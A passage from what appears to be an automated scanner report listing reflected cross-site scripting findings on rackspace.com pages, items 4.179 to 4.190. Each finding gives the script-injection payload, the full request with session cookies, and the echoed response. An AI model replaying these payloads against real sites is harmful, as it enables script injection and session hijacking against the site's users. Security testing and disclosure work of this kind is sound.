IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... utton('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/mediacenter/announcements/openstack.php?f6332"><script>alert(1)</script>5c0ff8b0e84=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.179. http://www.rackspace.com/partners/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/partners/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 295ac"><script>alert(1)</script>efd95d381f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /partners/index.php?295ac"><script>alert(1)</script>efd95d381f4=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... e-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/partners/index.php?295ac"><script>alert(1)</script>efd95d381f4=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.180. http://www.rackspace.com/partners/partnersearch.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/partners/partnersearch.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5d9"><script>alert(1)</script>a767629db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /partners/partnersearch.php?ce5d9"><script>alert(1)</script>a767629db4e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/partners/partnersearch.php?ce5d9"><script>alert(1)</script>a767629db4e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.181. http://www.rackspace.com/searchresults.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/searchresults.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df81"><script>alert(1)</script>8789091b848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /searchresults.php?4df81"><script>alert(1)</script>8789091b848=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf622"><script>alert(1)</script>9a19425fe4 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /searchresults.php?q=bf622"><script>alert(1)</script>9a19425fe4 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... -wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/searchresults.php?q=bf622"><script>alert(1)</script>9a19425fe4&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.183. http://www.rackspace.com/sitemap.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/sitemap.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a04"><script>alert(1)</script>84fad394893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap.php?95a04"><script>alert(1)</script>84fad394893=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... atinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/sitemap.php?95a04"><script>alert(1)</script>84fad394893=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.184. http://www.rackspace.com/sitemap404.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/sitemap404.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f665e"><script>alert(1)</script>87663995fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap404.php?f665e"><script>alert(1)</script>87663995fe4=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6288f"><script>alert(1)</script>43537466cbb was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <a onclick="javascript:window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/sitemap404.php?url=/crossdomain.xml6288f"><script>alert(1)</script>43537466cbb&optionaldata3=cleanEntry&optionaldata4=US38d41377d7def08a22a9a00f4d26f41d&optionaldata5=2f0f5a4286904ef0a856f07e','custclient','width=500,height=320');return false;" target="custclient" sty ...[SNIP]...
4.186. http://www.rackspace.com/whyrackspace/expertise/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/expertise/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff99"><script>alert(1)</script>b24458cde80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/expertise/index.php?9ff99"><script>alert(1)</script>b24458cde80=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... click="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/expertise/index.php?9ff99"><script>alert(1)</script>b24458cde80=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.187. http://www.rackspace.com/whyrackspace/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c0e"><script>alert(1)</script>8c1d50ab811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/index.php?75c0e"><script>alert(1)</script>8c1d50ab811=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/index.php?75c0e"><script>alert(1)</script>8c1d50ab811=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.188. http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/network/bandwidthbilling.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6d0"><script>alert(1)</script>a6f38532589 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/network/bandwidthbilling.php?1e6d0"><script>alert(1)</script>a6f38532589=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ack_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php?1e6d0"><script>alert(1)</script>a6f38532589=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.189. http://www.rackspace.com/whyrackspace/network/datacenters.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/network/datacenters.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a38b"><script>alert(1)</script>f54df7eb482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/network/datacenters.php?5a38b"><script>alert(1)</script>f54df7eb482=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/network/datacenters.php?5a38b"><script>alert(1)</script>f54df7eb482=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.190. http://www.rackspace.com/whyrackspace/network/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/whyrackspace/network/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d9"><script>alert(1)</script>dd3b2933cd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
